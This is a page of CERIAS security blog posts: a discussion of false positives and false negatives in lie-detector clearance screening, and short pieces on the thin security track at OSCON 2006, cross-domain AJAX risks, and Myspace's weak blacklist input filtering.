The Center for Education and Research in Information Assurance and Security (CERIAS)

The Center for Education and Research in
Information Assurance and Security (CERIAS)

CERIAS Blog

Page Content

A few comments on errors

Share:

I wrote a post for Dave Farber’s IP list on the use of lie detectors by the government.  My basic point was that some uses of imperfect technology are ok, if we understand the kind of risks and errors we are encountering.  I continue to see people without an understanding of the difference between Type I and Type II errors, and the faulty judgements made as a result.

What follows is a (slightly edited) version of that post:


The following is a general discussion.  I am in no sense an expert on lie detectors, but this is how it was explained to me by some who are very familiar with the issue.

Lie detectors have a non-zero rate of error.  As with many real-world systems, these errors manifest as Type I errors (alpha error, false positive) and Type II errors (beta error, false negative), and instances of “can’t tell.”  It’s important to understand the distinction because the errors and ambiguities in any system may not be equally likely, and the consequences may be very different.  An example I give to my students is after going over a proof that writing a computer virus checker that accurately detects all computer viruses is equivalent to solving the halting problem.  I then tell them that I can provide them with code that identifies every program infected with a computer virus in constant running time.  They think this is a contradiction of the proof.  I then write on the board the equivalent of “Begin; print “Infected!”; End.” —identify every program as infected.  There are no Type II errors.  However, there are many Type I errors, and thus this is not a useful program.  But I digress (slightly)...

I have been told that lie detectors more frequently exhibit Type I errors because subjects may be nervous or have a medical condition, and that Type II errors generally result from training or drugs (or both) by the subject, although some psychological disorders allow psychopaths to lie undetectably.  Asking foil questions (asking the subject to lie, and asking a surprise question to get a reaction) helps to identify individuals with potential for Type II errors.  Proper administration (e.g., reviewing the questions with the subject prior to the exam, and revising them as necessary to prevent ambiguity), helps to minimize Type I errors.  [Example.  When granting a security clearance, you want to weed out people who might be more likely to commit major crimes, or who have committed them already and not yet been discovered (they may be more prone to blackmail, or future offenses).  Thus, you might ask “Have you committed any crimes you haven’t disclosed on your application?”  Someone very literal-minded might think back to speeding down the Interstate this morning, lying to buy beers at age 20, and so on, and thus trigger a reaction.  Instead, the examiner should explain before the exam that the question is meant to expose felonies, and not traffic violations and misdemeanors.]  “Can’t tell” situations are resolved by giving the exam again at a later time, or by reporting the results as ambiguous.

In a criminal investigation, any error can be a problem if the results are used as evidence.***  For instance, if I ask “Did you commit the robbery?” and there is a Type I error, I would erroneously conclude you were guilty.  Our legal system does not allow this kind of measurement as evidence, although the police may use a negative result to clear you of suspicion.  (This is not generally a good step to take in some crimes, because some psychopaths are able to lie so as to generate Type II errors.)  If I asked “Are you going to hijack this plane?” then you might be afraid of the consequences of a false reading, or have a fear of flying, and there would be a high Type I error rate.  Thus, this probably won’t be a good mechanisms to screen passengers, either.  (However, current TSA practice in other areas is to have lots of Type I errors in hopes of pushing Type II to zero.  Example is not letting *any* liquids or gels on planes, even if harmless, so as to keep any liquid explosives from getting on board.)

When the US government uses lie detectors in security clearances, they aren’t seeking to identify EXACTLY which individuals are likely to be a problem.  Instead, they are trying to reduce the likelihood that people with clearances will pose a risk and it is judged as acceptable to have some Type I errors in the process of minimizing Type II errors.  So, as with many aspects of the adjudication process, they simply fail to grant a clearance to people who score too highly in some aspect of the test—include a lie detector test.  They may also deny clearances to people who have had too many close contacts with foreign nationals, or who have a bad history of going into debt, or any of several other factors based on prior experience and analysis.  Does that mean that those people are traitors?  No, and the system is set to not draw that specific conclusion.  If you fail a lie detector test for a clearance, you aren’t arrested for treason! *  The same if your evaluation score on the background investigation rates too high for lifestyle issues.  What it DOES mean is that there are heightened indications of risk, and unless you are “special” for a particular reason,**  the government chooses to not issue a clearance so as to reduce the risk.  Undoubtedly, there are some highly qualified, talented individuals who are therefore not given clearances.  However, they aren’t charged with anything or deprived of fundamental rights or liberties.  Instead, they are simply not extended a special classification.  The end result is that people who pass through the process to the end are less likely to be security risks than an equal sample drawn from the regular population.

The same screening logic is used in other places.  For instance, consider blood donation.  One of the questions that will keep a donation from being used in transfusions is if the donor is a male and indicates that he has had sex with another male since (I think) 1980.  Does that mean that everyone in that category has hepatitis or HIV?  No!  It only means that those individuals, as a class, are at higher risk, and they are a small enough subset that it is worth excluding them from the donor pool to make the donations safer in aggregate.  Other examples include insurance premiums (whether to grant insurance to high risk individuals), and even personal decisions (“I won’t date women with multiple facial piercings and more than 2 cats—too crazy.”)  These are general exclusions that almost certainly include some Type I errors, but the end result is (in aggregate) less risk.

Back to lie detectors.  There are two cases other than initial screening that are of some concern.  The first is on periodic rechecks (standard procedure), and when instituting new screening on existing employees, as was done at some of the national labs a few years ago.  In the case of periodic rechecks, the assumption is that the subject passed the exam before, and a positive reading now is either an indication that something has happened, or is a false positive.  Examiners often err on the side of the false positive in this case rather than triggering a more in-depth exam;  Aldrich Ames was one such case (unfortunately), and he wasn’t identified until more damage was done.  If one has a clearance and goes back for a re-exam and “flunks” it, that person is often given multiple opportunities to retake it.  A continued inability to pass the exam should trigger a more in-depth investigation, and may result in a reassignment or a reduction in access until a further determination is made.  In some cases (which I have been told are rare) someone’s clearance may be downgraded or revoked.  However, even in those cases, no statement of guilt is made—it is simply the case that a privilege is revoked.  That may be traumatic to the individual subject, certainly, but so long as it is rare it is sound risk management in aggregate for the government.

The second case, that of screening people for the first time after they have had access already and are “trusted” in place, is similar in nature except it may be viewed as unduly stressful or insulting by the subjects—as was the case when national lab employees were required to pass a polygraph for the first time, even though some had had DoE clearances for decades.  I have no idea how this set of exams went.

Notes to the above

*—Although people flunking the test may not be charged with treason, they may be charged with falsifying data on the security questionnaire!  I was told of one case where someone applying for a cleared position had a history of drug use that he thought would disqualify him, so he entered false information on his clearance application.  When he learned of the lie detector test, he panicked and convinced his brother to go take the test for him.  The first question was “Are you Mr. X?” and the stand-in blew the pens off the charts.  Both individuals were charged and pled guilty to some kind of charges; neither will ever get a security clearance! grin

**—Difficult and special cases are when someone, by reason of office or designation, is required to be cleared.  So, for instance, you are nominated to be the next Secretary of Defense, but you can’t pass the polygraph as part of the standard clearance process.  This goes through a special investigation and adjudication process that was not explained to me, and I don’t know how this is handled.

***—In most Western world legal systems.  In some countries, fail the polygraph and get a bullet to the head.  The population is interchangeable, so no need to get hung up on quibbles over individual rights and error rates.  Sociopaths who can lie and get away with it (Type II errors) tend to rise to the top of the political structures in these countries, so think of it as evolution in action….


So, bottom line:  yes, lie detector tests generate errors, but the process can be managed to reduce the errors and serve as a risk reduction tool when used in concert with other processes.  That’s how it is used by the government.

OSCON 2006: Where’s the Security?

Share:

Energizing the IndustryOSCON 2006 was a lot of fun for a lot of reasons, and was overall a very positive experience.  There were a few things that bugged me, though.

I met a lot of cool people at OSCON.  There are too many folks to list here without either getting really boring or forgetting someone, but I was happy to put a lot of faces to names and exchange ideas with some Very Smart People.  The PHP Security Hoedown BOF that I moderated was especially good in that respect, I thought.  There were also a lot of good sessions, especially Theo Schlossnagle’s Big Bad PostgreSQL: A Case Study, Chris Shiflett’s PHP Security Testing, and the PHP Lightning Talks (“PHP-Nuke is a honeypot” - thank you for the best quote of the convention, Zak Greant).

On the other hand, I was very surprised that the Security track at OSCON was almost nonexistent.  There were four sessions and one tutorial, and for a 5-day event with lots of sessions going on at the same time, that seems like a really poor showing.  The only other tracks that has security-related sessions were:

  • Linux (including one shared with the Security track)
  • PHP

which leaves us with the following tracks with no security-oriented sessions:

  • Business
  • Databases
  • Desktop Apps
  • Emerging Topics
  • Java
  • JavaScript/Ajax
  • Perl
  • Products and Services
  • Programming
  • Python
  • Ruby
  • Web Apps
  • Windows

I can certainly think of a few pertinent security topics for each of these tracks.  I’m not affiliated with O’Reilly, and I have no idea whether the OSCON planners just didn’t get very many security-related proposals, or they felt that attendees wouldn’t be interested in them.  Either way, it’s worrisome.

Security is an essential part of any kind of development: as fundamental as interface design or performance.  Developers are stewards of the data of their users, and if we don’t take that responsibility seriously, all our sweet gradient backgrounds and performance optimizations are pointless.  So to see, for one reason or another, security relegated to steerage at OSCON was disappointing.  I hope O’Reilly works hard to correct this next year, and I’m going to encourage other CERIAS folk like Pascal Meunier and Keith Watson to send in proposals for 2007.

Shiflett on the danger of cross-domain AJAX scripting

Share:

Chris Shiflett has posted a good piece in his blog on the potential danger of cross-domain AJAX scripting (digg here).  When Chris and I discussed this at OSCON, I was pretty surprised that anyone would think that violating the same-origin restrictions was in any way a good idea.  His post gives a good example of how dangerous this would be.

CERIAS at Portland OSCON 2006

Share:

Just a reminder: next week I’ll be in Portland at OSCON 2006.  I’ll be moderating the PHP Security Hoedown wednesday night.  If you’re interested in meeting up and talking about web app security stuff or CERIAS, please drop us a line at oscon@cerias.purdue.edu.

The biggest mistake of Myspace

Share:

Myspace, the super-popular web site that your kid uses and you don’t, was once again hit by a worm, this time utilizing Macromedia Flash as its primary vector.  This was a reminder for me of just how badly Myspace has screwed up when it comes to input filtering:

  • They use a “blacklist” approach, disallowing customized markup that they know could be an issue.  How confident are you that they covered all their bases, and could anticipate future problems?  I don’t trust my own code that much, let alone theirs.
  • They allow embed HTML tags.  That means letting folks embed arbitrary content that utilizes plugins, like… Flash. While Myspace filters Javascript, they seem to have forgotten that Flash has Javascript interaction and DOM manipulation capabilities.  If you’re a Myspace user, you may have noticed Javascript alert()-style pop-up windows appearing on some profiles—those are generated by embedding an offsite Flash program into a profile, which then generates Javascript code.

Even if they can plug these holes, it’s unlikely that anything short of a full rewrite/refactorization of their profile customization system can ever be considered moderately secure.

So will Myspace get their act together and modify their input filtering approaches? Very unlikely.  A large portion of Myspace’s appeal relies upon the customization techniques that allow users to decorate their pages with all manner of obnoxious flashing, glittery animations and videos.  Millions of users use cobbled-together hacks to twist their profiles into something fancier than the default, and a substantial cottage industry has sprung up around the subject.  Doing proper input filtering means undoing much of that.

Even if relatively secure equivalent techniques are offered, Myspace would certainly find themselves with a disgruntled user base that’s more likely to bail to a competitor.  That’s an incredibly risky move in the social networking market, and will likely lead Myspace to continue plugging holes rather than building a dam that works.

This is why you can’t design web applications with security as an afterthought.  Myspace has, and I think it will prove to be their biggest mistake.